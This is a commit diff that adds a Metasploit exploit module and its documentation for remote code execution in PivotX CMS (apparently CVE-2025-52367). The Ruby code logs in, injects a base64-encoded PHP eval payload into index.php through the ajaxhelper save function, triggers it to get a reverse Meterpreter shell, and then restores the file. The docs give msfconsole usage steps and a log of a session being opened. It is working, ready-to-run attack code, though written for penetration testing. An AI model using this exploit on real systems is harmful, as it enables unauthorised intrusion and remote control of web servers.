Module init

msutovsky-r7 · msutovsky-r7 · commit ed5c13330fa7 · 2025-07-21T12:41:38.000+02:00
diff --git a/documentation/modules/exploit/linux/http/pivotx_rce.md b/documentation/modules/exploit/linux/http/pivotx_rce.md
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
+It's written in PHP and uses MySQL or flat files as a database.
+
+Install steps:
+
+1. Install Apache2, MySQL, PHP8.2+
+1. `git clone https://github.com/pivotx/PivotX.git`
+1. Move `PivotX` to webfolder
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/pivotx_rce`
+1. Do: `set USERNAME [PivotX username]`
+1. Do: `set PASSWORD [PivotX password]`
+1. Do: `set RHOSTS [target IP]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `run`
+
+## Options
+
+
+### USERNAME
+
+PivotX username.
+
+### PASSWORD
+
+PivotX password.
+
+## Scenarios
+
+```
+msf exploit(linux/http/pivotx_rce) > run verbose=true 
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Sending stage (40004 bytes) to 192.168.168.146
+[*] Meterpreter session 4 opened (192.168.168.128:4444 -> 192.168.168.146:40562) at 2025-07-18 14:20:03 +0200
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
+Meterpreter : php/linux
+
+```
diff --git a/modules/exploits/linux/http/pivotx_rce.rb b/modules/exploits/linux/http/pivotx_rce.rb
@@ -0,0 +1,169 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  include Exploit::Remote::Tcp
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PivotX Remote Code Execution',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'HayToN', # security research
+          'msutovsky-r7' # module dev
+        ],
+        'References' => [
+          [ 'EDB', '52361' ],
+          [ 'URL', 'https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3'],
+          [ 'CVE', '2025–52367']
+        ],
+        'Targets' => [
+          [
+            'Linux',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+        'DisclosureDate' => '2025-07-10',
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options([
+      OptString.new('USERNAME', [ true, 'PivotX username', '' ]),
+      OptString.new('PASSWORD', [true, 'PivotX password', '']),
+      OptString.new('TARGETURI', [true, 'The base path to PivotX', '/PivotX/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php')
+    })
+
+    return Exploit::CheckCode::Unknown, 'Unexpected response' unless res&.code == 200
+
+    return Exploit::CheckCode::Safe, 'Target is not PivotX' unless res.body.include?('PivotX Powered')
+
+    html_body = res.get_html_document
+
+    return Exploit::CheckCode::Unknow, 'Could not find version element' unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
+
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return Exploit::CheckCode::Appears("Detected PivotX  #{version}") if version <= Rex::Version.new('3.0.0-rc3')
+
+    return Exploit::CheckCode::Safe("PivotX  #{version} is not vulnerable.")
+  end
+
+  def login
+    boundary = Rex::Text.rand_text_alphanumeric(16).to_s
+    data_post = "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"returnto\"\r\n\r\n"
+    data_post << "\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"template\"\r\n\r\n"
+    data_post << "\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
+    data_post << "#{datastore['USERNAME']}\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
+    data_post << "#{datastore['PASSWORD']}\r\n"
+    data_post << "------WebKitFormBoundary#{boundary}\r\n"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php'),
+      'vars_get' => { 'page' => 'login' },
+      'ctype' => "multipart/form-data; boundary=----WebKitFormBoundary#{boundary}",
+      'data' => data_post,
+      'keep_cookies' => true
+    })
+
+    fail_with Failure::NoAccess, 'Login failed, probably incorrect credentials' unless res&.code == 200 && res.body.include?('Dashboard') && res.get_cookies =~ /pivotxsession=([a-zA-Z0-9]+);/
+
+    @csrf_token = Regexp.last_match(1)
+  end
+
+  def modify_file
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'index.php'),
+      'vars_get' => { 'page' => 'homeexplore' }
+    })
+
+    fail_with Failure::UnexpectedReply, 'Received unexpected response when fetching working directory' unless res&.code == 200 && res.body =~ /basedir=([a-zA-Z0-9]+)/
+
+    @base_dir = Regexp.last_match(1)
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'ajaxhelper.php'),
+      'vars_get' => { 'function' => 'view', 'basedir' => @base_dir, 'file' => 'index.php' }
+    })
+
+    fail_with Failure::UnexpectedReply, 'Received unexpected response when fetching index.php' unless res&.code == 200
+
+    @original_value = res.get_html_document.at('textarea')&.text
+
+    fail_with Failure::Unknown, 'Could not find content of index.php' unless @original_value
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'ajaxhelper.php'),
+      'vars_post' => { 'csrfcheck' => @csrf_token, 'function' => 'save', 'basedir' => @base_dir, 'file' => 'index.php', 'contents' => "<?php eval(base64_decode('#{Base64.strict_encode64(payload.encoded)}')); ?> #{@original_value}" }
+    })
+
+    fail_with Failure::PayloadFailed, 'Failed to insert malicious PHP payload' unless res&.code == 200 && res.body.include?('Wrote contents to file index.php')
+  end
+
+  def trigger_payload
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+  end
+
+  def restore
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'pivotx', 'ajaxhelper.php'),
+      'vars_post' => { 'csrfcheck' => @csrf_token, 'function' => 'save', 'basedir' => @base_dir, 'file' => 'index.php', 'contents' => @original_value }
+    })
+    vprint_status('Restoring original content')
+    vprint_error('Failed to restore original content') unless res&.code == 200 && res.body.include?('Wrote contents to file index.php')
+  end
+
+  def exploit
+    vprint_status('Logging in PivotX')
+    login
+    vprint_status('Modifying file and injecting payload')
+    modify_file
+    vprint_status('Triggering payload')
+    trigger_payload
+    restore
+  end
+end
